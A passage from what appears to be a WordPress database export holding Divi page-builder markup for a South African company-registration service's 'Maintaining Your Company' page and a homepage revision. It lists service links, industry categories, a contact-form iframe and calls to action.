max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Why should you maintain your company?</h2>[/et_pb_text][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" text_font_size_tablet=\"14px\" text_font_size_phone=\"14px\" text_font_size_last_edited=\"off|tablet\" locked=\"off\"]<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictum porta. Proin eget tortor risus. </p>\n<p>Mauris blandit aliquet elit, eget tincidunt nibh pulvinar a. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec velit neque, auctor sit amet aliquam vel, ullamcorper sit amet ligula. Curabitur arcu erat, accumsan id imperdiet et, porttitor at sem. Nulla quis lorem ut libero malesuada feugiat. Cras ultricies ligula sed magna dictu</p>[/et_pb_text][/et_pb_column_inner][/et_pb_row_inner][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Annual Returns\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/annual-returns/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Closed Corporation Members\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-members/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Company  Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-company-address/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company Register\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/company-register-2/\" locked=\"off\"][/et_pb_blurb][/et_pb_column][et_pb_column type=\"1_4\" _builder_version=\"3.25\" custom_padding=\"|||\" padding_tablet__hover=\"0px||\" padding_last_edited__hover=\"on|desktop\" padding_top__hover=\"100px\" parallax__hover=\"off\" parallax_method__hover=\"on\" custom_padding__hover=\"|||\"][et_pb_blurb title=\"Change In Directors\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-directors/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Change In Closed Corporation Address\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/change-in-close-corporation-address/\" locked=\"off\"][/et_pb_blurb][et_pb_blurb title=\"Company and Closed Corporation Restoration\" use_icon=\"on\" font_icon=\"%%176%%\" icon_color=\"#1ca5ff\" use_icon_font_size=\"on\" icon_font_size=\"50px\" _builder_version=\"3.26.6\" header_font=\"Poppins|600||on|||||\" header_font_size=\"16px\" header_letter_spacing=\"1px\" header_line_height=\"1.6em\" background_color=\"#ffffff\" border_radii=\"on|8px|8px|8px|8px\" box_shadow_style=\"preset1\" box_shadow_vertical=\"10px\" box_shadow_blur=\"60px\" box_shadow_color=\"rgba(39,39,52,0.06)\" text_orientation=\"center\" custom_padding=\"30px|20px|30px|20px|true|true\" link_option_url=\"https://companyregistration.online/shop/maintaning-our-company/company-and-close-corporations-restorations/\" locked=\"off\"][/et_pb_blurb][/et_pb_column][/et_pb_section][et_pb_section fb_built=\"1\" admin_label=\"Process\" _builder_version=\"3.22\" locked=\"off\"][et_pb_row _builder_version=\"3.25\" locked=\"off\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" text_orientation=\"center\" max_width=\"700px\" module_alignment=\"center\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>We Build For the All of the Biggest  Categories</h2>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Healthcare</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Food &amp; Drink</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>ECommerce</h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Gaming </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Event </h3>[/et_pb_text][/et_pb_column][/et_pb_row][et_pb_row column_structure=\"1_5,1_5,1_5,1_5,1_5\" _builder_version=\"3.25\" custom_padding=\"0|0px|27px|0px|false|false\"][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Sports &amp; Fitness </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Real Estate </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>productivity </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Hospitality </h3>[/et_pb_text][/et_pb_column][et_pb_column type=\"1_5\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.19.6\" text_font=\"||||||||\" text_font_size=\"12px\" text_line_height=\"2em\" header_font=\"||||||||\" header_3_font=\"Poppins|600||on|||||\" header_3_text_color=\"#1ca5ff\" header_3_font_size=\"12px\" header_3_letter_spacing=\"1px\" header_3_line_height=\"1.6em\" text_orientation=\"center\" link_option_url=\"#\" locked=\"off\" header_3_text_color__hover_enabled=\"on\" header_3_text_color__hover=\"#3fd3ce\"]<h3>Education </h3>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" custom_padding_last_edited=\"on|tablet\" admin_label=\"Call to Action\" _builder_version=\"3.26.6\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"#edf8ff\" width=\"93%\" module_alignment=\"center\" custom_padding=\"||\" custom_padding_tablet=\"|0vw|30vw|\" bottom_divider_color=\"#ffffff\" bottom_divider_height=\"24vw\" bottom_divider_repeat=\"0.6x\" bottom_divider_flip=\"vertical|horizontal\" bottom_divider_arrangement=\"above_content\" locked=\"off\"][et_pb_row column_structure=\"1_2,1_2\" use_custom_gutter=\"on\" gutter_width=\"2\" _builder_version=\"3.25\" width=\"100%\" max_width=\"100%\" use_custom_width=\"on\" width_unit=\"off\" custom_width_percent=\"100%\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\" text_font=\"||||||||\" text_font_size=\"21px\" text_line_height=\"2em\" header_font=\"Poppins|600|||||||\" header_font_size=\"40px\" header_line_height=\"1.3em\" header_2_font=\"Poppins|600|||||||\" header_2_text_align=\"center\" header_2_font_size=\"32px\" header_2_line_height=\"1.6em\" max_width=\"700px\" header_2_font_size_tablet=\"24px\" header_2_font_size_phone=\"18px\" header_2_font_size_last_edited=\"on|phone\" locked=\"off\"]<h2>Not Exactly Sure What To Do?</h2>\n<p style=\"text-align: center;\">Fill our contact form and a consultant will get contact you to better discuss what services your company requires</p>[/et_pb_text][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/08/app-19.png\" show_bottom_space=\"off\" _builder_version=\"3.23\" max_width_tablet=\"400px\" max_width_last_edited=\"on|tablet\" animation_style=\"slide\" animation_direction=\"right\" animation_intensity_slide=\"1%\" always_center_on_mobile=\"off\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" custom_padding=\"|10vw||\" custom_padding_tablet=\"|10vw||10vw||true\" custom_padding_last_edited=\"on|tablet\" custom_padding__hover=\"|||\"][et_pb_text _builder_version=\"3.26.6\"]<iframe frameborder=\"0\" style=\"height: 720px; width: 99%; border: none;\" src=\"https://forms.zohopublic.com/mawincnetwork/form/ContactForm/formperma/mgyNovoEJpAyVGAXfwsVHV_TgNG-DKU904Sz1B2Verw\"></iframe>[/et_pb_text][/et_pb_column][/et_pb_row][/et_pb_section]','Maintaining Your Company','','publish','closed','closed','','maintaining-your-company','','','2019-08-16 09:51:25','2019-08-16 07:51:25','',0,'https://companyregistration.online/?page_id=32724',0,'page','',0),(32725,3,'2019-08-14 10:51:21','2019-08-14 08:51:21','<!-- wp:divi/placeholder /-->','Maintaining Your Company','','inherit','closed','closed','','32724-revision-v1','','','2019-08-14 10:51:21','2019-08-14 08:51:21','',32724,'https://companyregistration.online/32724-revision-v1/',0,'revision','',0),(32767,3,'2019-08-15 09:40:03','2019-08-15 07:40:03','[et_pb_section fb_built=\"1\" inner_shadow=\"on\" _builder_version=\"3.26.3\" background_image=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" background_size=\"contain\" background_repeat=\"repeat-y\" custom_padding=\"3px|0px|0px|0px\" top_divider_style=\"wave2\" top_divider_color=\"rgba(0,0,0,0)\" top_divider_height=\"46px\" top_divider_flip=\"horizontal\" animation_style=\"zoom\"][et_pb_row column_structure=\"1_2,1_2\" admin_label=\"Flags\" module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.26.3\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_margin=\"|||\" custom_padding=\"10px|0px|0px|0px\" make_fullwidth=\"on\" locked=\"off\"][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align_tablet=\"center\" align_last_edited=\"on|desktop\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2000ms\"][/et_pb_image][/et_pb_column][et_pb_column type=\"1_2\" _builder_version=\"3.25\" background_position=\"top_left\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/flag-waving-250.png\" align=\"right\" align_tablet=\"center\" align_last_edited=\"on|desktop\" disabled_on=\"on|on|off\" _builder_version=\"3.26.3\" max_width=\"70px\" animation_style=\"bounce\" animation_direction=\"top\" animation_duration=\"2500ms\" animation_delay=\"200ms\" animation_starting_opacity=\"8%\"][/et_pb_image][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.24\" background_color=\"#ffffff\" parallax=\"on\" custom_padding=\"20px|0px|1px|0px|false|false\"][et_pb_row module_class=\" et_pb_row_fullwidth\" _builder_version=\"3.25\" width=\"89%\" width_tablet=\"80%\" width_last_edited=\"on|desktop\" max_width=\"89%\" max_width_tablet=\"80%\" max_width_last_edited=\"on|desktop\" custom_padding=\"0px|0px|0px|0px\" make_fullwidth=\"on\"][et_pb_column type=\"4_4\" _builder_version=\"3.25\" custom_padding=\"|||\" custom_padding__hover=\"|||\"][et_pb_tabs active_tab_background_color=\"#7cda24\" inactive_tab_background_color=\"#e8e8e8\" _builder_version=\"3.24\" tab_font=\"|700|||||||\" use_background_color_gradient=\"on\" background_color_gradient_start=\"#ffffff\" background_color_gradient_end=\"rgba(0,0,0,0.16)\" background_color_gradient_direction=\"179deg\" background_color_gradient_start_position=\"37%\" border_radii=\"on|10px|10px|10px|10px\" box_shadow_style=\"preset2\" animation_style=\"fold\" animation_direction=\"bottom\" animation_duration=\"1200ms\" animation_delay=\"100ms\"][et_pb_tab title=\"One stop\" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\"]<h3 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>All the registrations you require to get your company compliant and ready for business anywhere in <span style=\"font-size: x-large;\"><span style=\"color: #154907;\">S</span><span style=\"color: #e09900;\">o<span style=\"color: #184c0d;\">u</span><span style=\"color: #e02b20;\">t</span><span style=\"color: #0c71c3;\">h</span> <span style=\"color: #000000;\">A</span>f<span style=\"color: #195e10;\">r</span><span style=\"color: #e02b20;\">i</span><span style=\"color: #0c71c3;\">c</span><span style=\"color: #000000;\">a</span></span></span></strong></span></h3>\r[/et_pb_tab][et_pb_tab title=\"For Tenders\" _builder_version=\"3.2.1\" body_font=\"||||\" tab_font=\"Abel||||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4><strong><span style=\"font-family: Abel;\">Get all the registrations documents<a href=\"https://companyregistration.online/shop/combo-deals/tender-ready/\" target=\"_blank\" rel=\"noopener noreferrer\" title=\"Tender Ready\"> <span style=\"color: #993366;\">for your tender</span> </a>fast tracked and professionally done so that no opportunity is missed.</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Secure Payment Gateway\" _builder_version=\"3.24\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">We use a trusted South African payment gateway. No credit card information is maintained on our site. The payment gateway is a member of the Payments Association of South Africa (PASA)?</span></strong></h4>[/et_pb_tab][et_pb_tab title=\"Simple process\" _builder_version=\"3.24\" body_font=\"||||||||\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\">Purchase the service, complete the form, if applicable, submit supporting documentation and RELAX, you done, all from your arm chair.</span></strong></h4>\n<p style=\"text-align: center;\"><span style=\"color: #333399;\"><strong><span style=\"font-family: Abel;\">PROFESSIONAL,SIMPLE &amp; CONVENIENT</span></strong></span></p>[/et_pb_tab][et_pb_tab title=\"Professional Service\" _builder_version=\"3.2.1\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><span style=\"font-family: Abel; font-weight: normal;\"><strong>We advise you on the appropriate company to register and keep you informed all the way until the work process is complete or registered . We will also facilitate the opening of the business bank account anywhere in South Africa<br /> </strong></span></h4>[/et_pb_tab][et_pb_tab title=\"Visit Blog/FAQs \" _builder_version=\"3.0.85\" tab_font=\"Abel|on|||\" tab_font_size=\"17px\" inline_fonts=\"Abel\"]<h4 style=\"text-align: center;\"><strong><span style=\"font-family: Abel;\"><span style=\"color: #0c71c3;\"><a href=\"https://companyregistration.online/category/faqs/\" style=\"color: #0c71c3;\">Valuable information</a></span> about the right company to register, consequences of deregistration, difference between CIPC Annual Return and AnnualTax Return, etc</span></strong></h4>[/et_pb_tab][/et_pb_tabs][/et_pb_column][/et_pb_row][/et_pb_section][et_pb_section fb_built=\"1\" _builder_version=\"3.26.6\"][et_pb_row _builder_version=\"3.26.6\" column_structure=\"1_2,1_2\"][et_pb_column _builder_version=\"3.26.6\" type=\"1_2\"][et_pb_divider _builder_version=\"3.26.6\" show_divider=\"off\" height=\"125px\"][/et_pb_divider][et_pb_text _builder_version=\"3.26.6\" text_font=\"|700|||||||\" header_font=\"|700|||||||\" header_font_size=\"47px\" header_text_align=\"center\"]<h1 style=\"text-align: center;\">What Would You Like To Do First ?</h1>\n[/et_pb_text][/et_pb_column][et_pb_column _builder_version=\"3.26.6\" type=\"1_2\"][et_pb_image src=\"https://companyregistration.online/wp-content/uploads/2019/07/working-free-img.jpg\" _builder_version=\"3.26.6\"][/et_pb_image][/et_pb_column][/et_pb_row][et_pb_row _builder_version=\"3.26.6\" column_structure=\"1_4,1_4,1_4,1_4\" custom_margin=\"|223px||427px||\" width=\"98%\" max_width=\"1347px\" module_alignment=\"center\"][et_pb_column _builder_version=\"3.26.6\" type=\"1_4\"][et_pb_cta title=\"Register A Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" header_letter_spacing=\"2px\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/company-registrations/\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with 1 shareholder directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"3.26.6\" type=\"1_4\"][et_pb_cta title=\"Maintain My Company\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\"]<p style=\"text-align: center;\"><strong>Businesses with  shareholders who are not directly involved in running the business</strong></p>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"3.26.6\" type=\"1_4\"][et_pb_cta title=\"Register For Tax\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" border_radii=\"on|10px|10px|10px|10px\" border_width_all=\"0px\" border_color_all=\"#ffffff\" border_style_all=\"solid\" custom_button=\"on\" button_text_size=\"15px\" button_border_width=\"0px\" background_layout=\"light\" custom_margin=\"|||\" custom_padding=\"10px|5px|24px|5px||\" animation_style=\"flip\" animation_delay=\"400ms\" link_option_url=\"https://companyregistration.online/tax-registrations\" custom_css_main_element=\"box-shadow: 0px 0px 20px #bfb7b6;\" use_border_color=\"on\" border_width=\"0px\" button_text_size__hover_enabled=\"off\" button_one_text_size__hover_enabled=\"off\" button_two_text_size__hover_enabled=\"off\" button_text_color__hover_enabled=\"off\" button_one_text_color__hover_enabled=\"off\" button_two_text_color__hover_enabled=\"off\" button_border_width__hover_enabled=\"off\" button_one_border_width__hover_enabled=\"off\" button_two_border_width__hover_enabled=\"off\" button_border_color__hover_enabled=\"off\" button_one_border_color__hover_enabled=\"off\" button_two_border_color__hover_enabled=\"off\" button_border_radius__hover_enabled=\"off\" button_one_border_radius__hover_enabled=\"off\" button_two_border_radius__hover_enabled=\"off\" button_letter_spacing__hover_enabled=\"off\" button_one_letter_spacing__hover_enabled=\"off\" button_two_letter_spacing__hover_enabled=\"off\" button_bg_color__hover_enabled=\"off\" button_one_bg_color__hover_enabled=\"off\" button_two_bg_color__hover_enabled=\"off\" use_background_color=\"off\" background_color_gradient_direction=\"177deg\" background_blend=\"overlay\"]<p class=\"\"><strong>Business Professionals  such as </strong><b>Accountants, Lawyers and Doctors practicing.</b></p>[/et_pb_cta][/et_pb_column][et_pb_column _builder_version=\"3.26.6\" type=\"1_4\"][et_pb_cta title=\"Conbo Deals\" button_text=\"Start here\" admin_label=\"owner managed\" _builder_version=\"3.26.6\" header_font=\"Abel|on|||\" header_text_color=\"#0c71c3\" use_background_color=\"off\" 